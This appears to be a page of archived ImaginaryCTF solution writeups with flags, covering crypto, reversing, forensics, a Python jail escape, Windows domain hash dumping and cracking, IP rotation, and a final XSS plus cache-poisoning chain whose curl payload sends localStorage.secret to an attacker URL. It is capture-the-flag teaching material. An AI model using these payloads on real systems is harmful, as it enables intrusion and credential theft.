Archived Challenges - April 2023

Submit the flag.

ictf{b3tter_l4te_th4n_n3ver}

Build a list of all characters and match them to the provided outputs. https://imaginaryctf.org/f/x5HJn

ictf{partial_hash_data_is_sometimes_good_enough_4839}

command = lambda x: "cat *.txt"
import_list = []
os_list = []
x=__build_class__=lambda *_:_
g=x.__globals__
b=__builtins__
b|=g
type_class = lambda x: [].__class__.__class__
get_import = lambda x: x[0].register.__globals__["__builtins__"]["__import__"]
os_str = lambda x: "os"
@import_list.append
@get_import
@[].__class__.__class__.__subclasses__
@type_class
class X:
    ...
@os_list.append
@import_list[0]
@os_str
class X:
    ...
@os_list[0].system
@command
class X:
    ...

Robin has a fantastic writeup of using decorators (and a few other methods) to escape a similar pyjail here: https://ur4ndom.dev/posts/2022-07-04-gctf-treebox/

Here, you don't have access to builtins, so you need to run a standard pyjail escape using decorators whenever you would need to call a function. The code above runs [].__class__.__class__.__subclasses__([].__class__.__class__)[0].register.__globals__["__builtins__"]["__import__"]("os").system("cat *.txt") with a few points of interest.

First, you can pass in the innermost argument to the function by just making a lambda that returns that value. Second, you need to add a function called __build_class__ to builtins so you can make classes. Third, (I think) you can't have it all in one chain, because sometimes you need to take the result of a function call and access its attributes. I kept references to the objects I cared about by appending them to lists.

ictf{wait_maybe_the_problem_was_letting_people_run_code_in_the_first_place}

from pwn import *

LOCAL = 0

def get_new_process():
    if LOCAL:
        return process("python3 ./server.py".split())
    else:
        return remote("puzzler7.imaginaryctf.org", 12002)

p1 = get_new_process()
p2 = get_new_process()

p1.sendline(b"puzzler7")
p2.sendline(b"puzzler7")

p2.sendline(b"4")
p2.sendline(b"1")
p2.recvuntil(b"You are at location 1.")
for i in range(9):
    p1.sendline(b"1")
p1.recvuntil(b"You have the flag")

p2.sendline(b"2")
p2.interactive()

Python shelve caches values in memory rather than reading from the database, and only refreshes this cache when the db file is closed (or when sync is called). Thus, you can start two processes with the same name and leave one at the beginning. The first one can go grab the flag, and the moving the second player will teleport you back to the beginning.

Above solve script doesn't work all the time, I assume due to some race condition. You may have to run it a few times, or manually walk the flag to the finish.

ictf{the_easiest_way_to_win_ctf_is_just_teleport}

alphabet = bytes(range(32, 127))

def deseeksar(s, key):
    out = []
    for i, c in enumerate(s):
        out.append(alphabet[(c - key[i] - 64)%len(alphabet)])
    return bytes(out)

ct = b"M'HG\\BOE@CZ@QPQVMBS@EFNBOE@*@NFBO@RVBTBSgT@EFNBOE@xEpEsyqG^"
key = []
f = open("seeksar.py", 'rb')

for c in ct:
    key.append(f.read()[0])
    f.seek(key[-1])

print(deseeksar(ct, key))

The code just generates the key from the file, so it will be the same every time.

ictf{and_by_popular_demand_I_mean_quasar's_demand_8d0d391f}

from math import gcd
from Crypto.Util.number import long_to_bytes

exec(open("output.txt").read().replace("n % e*p", "nep"))

p = gcd(nep, n)
q = n // p
phi = (p - 1) * (q - 1)
d = pow(e, -1, phi)
print(long_to_bytes(pow(c, d, n)))

n % e*p is a multiple of p, so you can simply take the gcd to get p.

ictf{I_bet_people_will_z3_this_one_too}

#!/usr/bin/env python3

from z3 import *

ct = b'\x12>\xd3gx\xb1\xbdx?#\x99\xdf\x0ck:\xf1o\xe2\xb3\x88\xceP\xb0\xb0\xcc\x01\xbb\x8e\x86\x16\x1a6\xfaQ\xab\x9e7\xfdj\x86\xe9\xa4\x83\xc2\xb2\xb8'
vals = [b'ictf{'[i]^c for i, c in enumerate(ct[:5])]

a = BitVec("a", 8)
b = BitVec("b", 8)
c = BitVec("c", 8)

s = Solver()

for i in range(4):
    s.add(vals[i+1] == (a*vals[i]**2 + b*vals[i] + c) % 256)

print("checking")
print(s.check())
print(s.model())
av = s.model()[a].as_long()
bv = s.model()[b].as_long()
cv = s.model()[c].as_long()

x = vals[0]

for c in ct:
    print(chr(c^x), end='')
    x = (av*x**2 + bv*x + cv) % 256
print()

Despite all of the numbers being generated being 32 bits long, only the bottom 8 bits are used, meaning the space of possible constants is very small. Z3 makes short work of this, and even the naive 24-bit brute force is likely viable. (It's very likely that the underlying math is vulnerable, too, but I was lazy when I wrote this).

ictf{drat..._next_time_I'll_use_ALL_the_bits!}

https://crypto.stackexchange.com/questions/105628/is-it-insecure-to-sign-the-value-0-with-elgamal

The hash function only takes the first 12 digits of the hex digest, so it's possible to find a message that has a sha256 hash with 12 leading zeroes. Entering the message 62797a424c46414d3450656e6775696e and 0 for r and s will yield the flag.

This has OSINT flavors to it, so I figured I'd document how I found the hash, too.

• Google search for hash with all zeroes
• Find the stack overflow post: stack overflow post: https://stackoverflow.com/questions/25341517/md5-hash-with-leading-zeros
• That post has a link to http://www.crysys.hu/hashgame/allrecord.php which records records for min and max hashes
• Searching for the min md5 hash in google (00000000000000d4a49581c7f0638557) to see if the records are kept updated elsewhere leads to https://github.com/hletrd/md5-maxmin
• The github has the link to the sha256 (and other) records: https://beneri.se/hashgame/

And in doing research while validating this writeup, I'm finding that bitcoin uses sha256 hashing and has some hashes with enough leading zeroes, but I'm too tired to figure out how to access that data right now. That does make me feel better about the odds of people finding a valid hash, though.

ictf{i_hope_finding_the_hash_wasn't_too_hard...}

Use something like https://github.com/iphelix/pack or read about hashcat masks https://hashcat.net/wiki/doku.php?id=mask_attack and notice that all of the passwords begin with an uppercase four lowercase, then 2 digits, 5 lowercase, then 2 digits, so it would ?u?l?l?l?l?d?d?l?l?l?l?l?d?d

ictf{?u?l?l?l?l?d?d?l?l?l?l?l?d?d}

from pwn import *

bits = ''
ct = open('encoded.txt', 'rb').readlines()

for line in ct:
    bits += '1' if line.endswith(b'\r\n') else '0'

print(unbits(bits))

The lines end with \r\n and \n in binary fashion.

ictf{this_is_the_way_the_line_ends_not_with_a_carriage_return_but_a_line_feed.}

guestmount --add ImaginaryDomain.vhdx --inspector --ro ./mnt/ cp mnt/Windows/NTDS/ntds.dit . cp mnt/Windows/System32/config/SYSTEM . impacket-secretsdump -ntds ./ntds.dit -system ./SYSTEM LOCAL > hashes.txt hashcat -m 1000 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt

ictf{YRUGUYSLOOKINGATMYPASSWORD?POSERS}

https://imaginaryctf.org/f/9wA31#x.py

Just a simple xor cipher with a changing key - either use gdb to track how the key changes, or copy the data out and do it yourself.

ictf{don't_worry_we're_just_getting_st@rted}

from re import findall

check = open("snake.py").read()

rx = r'any\(.+?\)'

possible_chars = {}

for conds in findall(rx, check):
    nums = findall(r'\d+', conds)
    while len(nums) > 0:
        idx, val, *nums = nums
        if int(idx) not in possible_chars:
            possible_chars[int(idx)] = []
        possible_chars[int(idx)].append(chr(int(val)))

flag = ''
for i in sorted(possible_chars):
    flag += max(set(possible_chars[i]), key=possible_chars[i].count)
print(flag)

The lambdas simply check that at least one of the conditions is true at each step. You can extract these to get a list of possible characters for each position - combining the most common ones yields the flag.

ictf{I_b3t_y0u_ju5t_used_z3}

#include <stdio.h>
#include <stdlib.h>
#include <time.h>

int main() {
    unsigned int start = time(0);
    unsigned int key = start;

    FILE* file = fopen("./out.bin", "r");
    unsigned char ct[64];
    fread(ct, 64, 1, file);
    unsigned char pt[] = "ictf{";

    while(1) {
        srand(key);
        int bad = 0;
        for(int i = 0; i < 5; i++) {
            unsigned char temp_char = ct[i];
            for (int j = 0; j <= i; j++) {
                temp_char ^= rand();
            }
            if (temp_char != pt[i]) {
                bad = 1;
                break;
            }
        }
        if(bad == 0) {
            printf("win! %lu\n", key);
            srand(key);
            for(int i = 0; i < 64; i++) {
            unsigned char temp_char = ct[i];
                for (int j = 0; j <= i; j++) {
                    temp_char ^= rand();
                }
            printf("%c", temp_char);
        }
            printf("\n");
            break;
        }
        key -= 1;
        if (key == start) {
            printf("checked all possible keys\n");
            break;
        }

        if (key % 1000000 == 0) {
            printf("Status: %lu\n", key);
        }
    }
}

A rare writeup in C! Just brute-force to find the random seed. As the challenge title hints, the output was generated "in the future". Counting up from the current time will find the seed in ~30 seconds. If you didn't realize this, the time is cast to a 32-bit int before being used as the seed, so brute-forcing the entire space of possibilities can be done in less than an hour (and certainly much faster if optimized and/or running multiple searchers at once).

ictf{coming_to_you_live_from_twenty_twenty_five}

So, uh ... I don't actually have a writeup for this one.

The idea is that the lambda assembles numbers out of checks on the characters of the flag, and multiplies them together and compares the result against a number. It does this several times, and at least one comparison must be true to return the flag as true. However, all of the numbers it compares against are odd, and the lowest bit of one of the numbers in every multiplication checks against a known value (ictf{}). Thus, only the multiplications where this check is correct contain valid information, as the low bit of both numbers being multiplied must be 1.

Then, knowing which multiplications actually give you information, you can factor the number, and brute-force what each of the original numbers must have been, and then get the flag.

The goal for this was to make a challenge that you couldn't just plug into z3, but maple has written a simple z3 script here: https://imaginaryctf.org/f/IdOLy. One of these days I'll triumph over z3.

ictf{H3rcu13@n}

The flag was added to ImaginaryCTF twitter bio, then removed after taking a Wayback Machine snapshot. https://web.archive.org/web/20230405213948/https://twitter.com/imaginaryctf

ictf{t1m3_tr4v3l_w4y_b4ck_m4ch1n3}

Stack protector is disabled, and it is not position independent. leak libc and ROP to it https://imaginaryctf.org/f/ERbb6

ictf{just_4n_34sy_r3t2l1bc}

#!/usr/bin/env python3

import requests
from requests_ip_rotator import ApiGateway

url = 'http://puzzler7.imaginaryctf.org:12001'

flag = list(requests.get(url+"/flag").text)

gateway = ApiGateway(url)
gateway.start()

session = requests.Session()
session.mount(url, gateway)

while '?' in flag:
    response = session.get(url + "/flag")
    for i, c in enumerate(response.text):
        if c != '?':
            flag[i] = c
    print(''.join(flag))

gateway.shutdown()

Visit the website from multiple pages to get the entire flag. I used the requests-ip-rotator python package, alternate solutions include:

• use multiple devices
• use multiple wifi sources (home, school, work, library)
• use multiple team members
• use online tools like reqbin
• use a server
• use online consoles like the Google Cloud console
• use Tor

ictf{you_can_be_everywhere_with_the_power_of_the_internet_1a1cd33e49f28b3fad9a7f438e8f53f6}

There is an obvious reflected XSS in 404 Not Found, but browser will always encode < and > in path so you can't get XSS triggered easily from browser. On the other hand, it is easily to make it send unencoded < and > using curl, combining it with nginx cache poisoning (cache key doesn't include query parameters) so you can get it to return HTML. You can use another 404 Not Found to construct valid JS to bypass CSP.

tok=$RANDOM
host="http://ictf2.maple3142.net:11223"
your_website="http://SOME_NGROK_URL"
curl "$host/$tok/*?*/;location='$your_website/?'+localStorage.secret//"
curl "$host/html$tok?<script/src=/$tok/*></script>"
echo ""
echo "Visit: $host/html$tok"
curl "$host/report" -G -d "url=$host/html$tok" -X POST

ictf{it_is_always_about_cache}